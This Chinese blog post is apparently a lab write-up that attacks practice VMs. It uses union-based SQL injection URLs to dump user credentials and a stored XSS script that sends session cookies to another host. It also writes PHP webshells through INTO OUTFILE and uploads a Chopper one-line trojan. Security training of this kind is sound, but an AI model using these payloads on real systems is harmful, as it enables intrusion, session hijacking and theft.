博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
实验五
阅读量:5041 次
发布时间:2019-06-12

本文共 2131 字,大约阅读时间需要 7 分钟。

一、SQL注入

首先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.1.134的可疑ip地址

使用nmap扫描端口 发现该ip开启了ftp和http两个服务

打开该虚拟机提供的网页 发现网站使用url传参 可能存在sql注入点

在id=1后加一个引号,网页报错 该网站存在sql注入漏洞

使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素

使用联合查询 查看网页的显示位

得到显示位就可以显示数据库的名字 photoblog

得到数据库名字 可以顺藤摸瓜查询数据库中有那些表

http://192.168.1.134/cat.php?id=1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

由于是要拿到 root 权限 因此我们只需关系user表中的数据 可以看出users表中有 id login password 三列元素

http://192.168.1.134/cat.php?id=1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

检索id,login,password

http://192.168.1.134/cat.php?id=1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

admin的密码:8efe310f9ab3efeae8d410a8e0166eb2

密码为:P4ssw0rd

登录网站后的界面:

 上传一句话木马

字节过大,3-8个字节

改扩展名发现可以上传:

 

用菜刀输入:木马位置从而对网站进行管理:

二、XSS攻击:

 netdiscover 和 nmap 双管齐下 得到靶机的网络信息 提供了80服务

登录发现是个留言板 尝试使用 xss 弹个窗

发现有弹窗回显 存在 xss 漏洞

在靶机上留言<script>document.write('<img src="http://192.168.112.132/?'+document.cookie+' "/>')</script>

可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

 

http://192.168.1.135/admin/edit.php?id=4 union select 1,2,3,4

发现2和3可以显示出来。

http://192.168.1.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.1.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.1.135/css/s.php

 

 

说明s.php文件成功写入到/var/www/css 目录,下面将

<?php system($_GET['c']); ?>

写入z.php中,构造url为:

http://192.168.1.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

下面写入一句话木马,构造url:

http://192.168.1.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

 

 

转载于:https://www.cnblogs.com/p201521430044/p/8960731.html

你可能感兴趣的文章
树链剖分入门
查看>>
图解算法时间复杂度
查看>>
UI_搭建MVC
查看>>
一个样例看清楚JQuery子元素选择器children()和find()的差别
查看>>
代码实现导航栏分割线
查看>>
Windows Phone开发(7):当好总舵主 转:http://blog.csdn.net/tcjiaan/article/details/7281421...
查看>>
ASP.Net页面和控件缓存设置
查看>>
SEO第一步做什么
查看>>
Python-01作业(登录和三级菜单)
查看>>
64位操作系统下IIS报“试图加载格式不正确的程序”错误
查看>>
spring-qualifier解释
查看>>
URL参数中文乱码解决
查看>>
iframe的一些介绍
查看>>
mapper.xml实现oracle的分页语句
查看>>
[51nod1267]4个数和为0(预处理+双指针)
查看>>
[poj2151]Check the difficulty of problems概率dp
查看>>
深入浅出之Smarty模板引擎工作机制(一)
查看>>
UE4物理动画使用
查看>>
线程间操作无效: 从不是创建控件“listBox1”的线程访问它
查看>>
2014.09.11 cURL
查看>>